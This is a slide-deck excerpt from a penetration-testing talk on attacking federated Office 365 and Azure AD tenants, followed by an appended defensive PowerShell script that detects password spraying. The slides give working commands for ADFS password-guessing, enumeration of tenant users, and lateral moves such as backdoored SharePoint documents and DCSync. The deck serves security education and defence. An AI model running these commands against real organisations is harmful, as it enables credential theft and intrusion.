  • 49. Skype Message Phishing • Further Work ‒ Grab a domain's worth of phone numbers • Got this working while making these slides… • Should work if you already have creds ‒ Brute-Forcing Skype Creds • Not easy with the Lync SDK • Nyxgeek has some great methods that will be added to PowerSkype
  • 51. Dictionary Attacks Against ADFS • Get-ADFSEndpoint gives us the appropriate command to run for the domain ‒ Federated Domain
  • 52. Dictionary Attacks Against ADFS • Invoke-ADFSSecurityTokenRequest* Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName -ADFSBaseUri https://adfs.example.com/ -AppliesTo https://adfs.example.com/adfs/services/trust/13/usernamemixed -UserName 'karl.fosaaen' -Password 'Winter2016' -Domain 'example.com' -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors https://blogs.msdn.microsoft.com/besidethepoint/2012/10/17/request-adfs-security-token-with-powershell/
  • 53. Dictionary Attacks Against ADFS • Get-ADFSEndpoint gives us the appropriate command to run for the domain ‒ Microsoft Managed Domain
  • 54. Dictionary Attacks Against ADFS • Connect-msolservice – AzureAD PS Module
  • 56. Enumeration of Other Domain Users • Not totally necessary, but it can be handy 1. $msolcred = get-credential 2. connect-msolservice -credential $msolcred 3. Get-MsolUser -All | ft -AutoSize • This also works for apps using AzureAD for account management
  • 57. Enumeration of Other Domain Users • Using the Graph API
  • 58. Enumeration of Other Domain Users • Using the Graph API $token = Get-GraphAPIToken -TenantName DOMAIN_GOES_HERE Get-GraphData -Token $token -Tenant DOMAIN_GOES_HERE -Resource users ‒ This works for federated and managed domains • Github – https://github.com/NetSPI/PowerShell/blob/master/Get-GraphAPIToken.ps1
  • 59. Enumeration of Other Domain Users Demo • $token = Get-GraphAPIToken -TenantName microsoftsupport.online • Get-GraphData -Token $token -Tenant microsoftsupport.online -Resource users
  • 60. Enumeration of Other Domain Users
  • 61. Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains • If the domain uses Office365, you can connect to it with PowerShell
  • 62. Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains (1/2) $PWord = ConvertTo-SecureString -String 'Summer2016' -AsPlainText -Force $credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "test@example.com", $PWord
  • 63. Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains that have OWA tied to O365 (2/2) Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {Get-Recipient -ResultSize unlimited} | Export-CSV c:\temp\email_users.csv -NoTypeInformation
  • 64. Enumeration of Other Domain Users
  • 65. Pivoting to the Internal Network
  • 66. Pivoting to the Internal Network • Single Factor VPN Example ‒ Enumerated user emails on LinkedIn ‒ Guessed passwords against MSOnline with PowerShell ‒ Enumerated VPN interfaces ‒ Logged in with guessed credentials ‒ GPP -> Local admin on DA system ‒ DCSync • “Store passwords using reversible encryption”
  • 67. Pivoting to the Internal Network • Other Routes ‒ Single Factor Services • Management Protocols • RDP • SSH • Sharepoint • Terminal Services – Web Based • Citrix • VDI • Etc.
  • 68. Pivoting to the Internal Network • Malicious OneDrive Documents ‒ Can’t use macros in the online version of excel
  • 69. Pivoting to the Internal Network • Malicious SharePoint Documents ‒ Same concept as OneDrive, just a different platform ‒ Backdoor a document ‒ Edit pages
  • 70. Pivoting to the Internal Network • Send messages from OWA or Skype for Business ‒ Autodiscover is handy ‒ People will trust their co-workers • “Can you look over this word doc for me?”
  • 71. Pivoting to the Internal Network • Attacking Email Accounts ‒ If Autodiscover is enabled, adding an account can be done from anywhere ‒ Email is interesting, but I’d like a shell ‒ This cannot be done programmatically with PowerShell (*Easily) ‒ “Malicious Outlook Rules” • Nick Landers – Silent Break Security ‒ “MAPI over HTTP and Mailrule Pwnage” • Etienne - sensepost
  • 73. Attack Mitigations • Enable Dual factor authentication for external endpoints* *On all channels
  • 74. Attack Mitigations • Limit federation to trusted domains • Limit exposed services surface area • Monitor your Federated and Azure endpoints • Enforce strong password requirements
  • 75. Thanks! • My NetSPI Co-workers ‒ QA/Ideas/Suggestions • My NetSPI Management Team ‒ For giving me time to work on this • Jared Bird - @jaredbird ‒ For asking me about federation years ago
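
One way to act on the "Monitor your Federated and Azure endpoints" mitigation (slide 74) against the dictionary attacks on slides 51-54, as an added example that is not part of the original deck or NetSPI's scripts: flag any source address that fails sign-in for many distinct users inside a short window, and list the accounts that then signed in successfully from that source. The function name `Find-PasswordSpray`, the CSV column names, the thresholds and the sample records are all assumptions made for this example.

```powershell
# Constructed sign-in records (not real log data). The column names are
# assumptions for this example; map them from your own AD FS or Azure AD
# sign-in log export.
$sampleCsv = @'
Time,SourceIp,User,Result
2016-09-24T10:00:05Z,203.0.113.7,alice@example.com,Failure
2016-09-24T10:00:09Z,203.0.113.7,bob@example.com,Failure
2016-09-24T10:00:14Z,203.0.113.7,carol@example.com,Failure
2016-09-24T10:00:18Z,203.0.113.7,dave@example.com,Failure
2016-09-24T10:00:23Z,203.0.113.7,erin@example.com,Failure
2016-09-24T10:00:27Z,203.0.113.7,frank@example.com,Success
2016-09-24T10:03:40Z,198.51.100.20,alice@example.com,Failure
2016-09-24T10:04:02Z,198.51.100.20,alice@example.com,Success
2016-09-24T11:30:00Z,203.0.113.7,grace@example.com,Failure
'@

function Find-PasswordSpray {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [object[]] $SignIn,
        [int] $WindowMinutes = 10,      # assumed threshold, tune per environment
        [int] $MinDistinctUsers = 5     # assumed threshold, tune per environment
    )

    # Normalise the records: UTC timestamps, lower-cased user names.
    $style = [System.Globalization.DateTimeStyles]::AdjustToUniversal
    $rows = foreach ($e in $SignIn) {
        [pscustomobject]@{
            Time     = [datetime]::Parse($e.Time, [cultureinfo]::InvariantCulture, $style)
            SourceIp = $e.SourceIp
            User     = $e.User.ToLowerInvariant()
            Result   = $e.Result
        }
    }

    foreach ($src in ($rows | Group-Object -Property SourceIp)) {
        $sorted = @($src.Group | Sort-Object -Property Time)
        $start  = 0
        $best   = $null

        for ($end = 0; $end -lt $sorted.Count; $end++) {
            # Slide the left edge so the window never spans more than $WindowMinutes.
            while (($sorted[$end].Time - $sorted[$start].Time).TotalMinutes -gt $WindowMinutes) {
                $start++
            }
            # Distinct users that failed authentication inside the current window.
            $failedUsers = @($sorted[$start..$end] |
                Where-Object { $_.Result -eq 'Failure' } |
                Select-Object -ExpandProperty User -Unique)

            # Keep the densest qualifying window seen for this source.
            if ($failedUsers.Count -ge $MinDistinctUsers -and
                ($null -eq $best -or $failedUsers.Count -gt $best.FailedUsers)) {
                $best = [pscustomobject]@{
                    SourceIp       = $src.Name
                    FailedUsers    = $failedUsers.Count
                    WindowStart    = $sorted[$start].Time
                    WindowEnd      = $sorted[$end].Time
                    SuccessesAfter = @()
                }
            }
        }

        if ($best) {
            # Successful sign-ins from the same source once the burst began are
            # the accounts to reset and review first.
            $best.SuccessesAfter = @($sorted |
                Where-Object { $_.Result -eq 'Success' -and $_.Time -ge $best.WindowStart } |
                Select-Object -ExpandProperty User -Unique)
            $best
        }
    }
}

Find-PasswordSpray -SignIn ($sampleCsv | ConvertFrom-Csv) | Format-List
```

A single user mistyping a password and then succeeding, like the second source address in the sample, stays below the distinct-user threshold and is not reported.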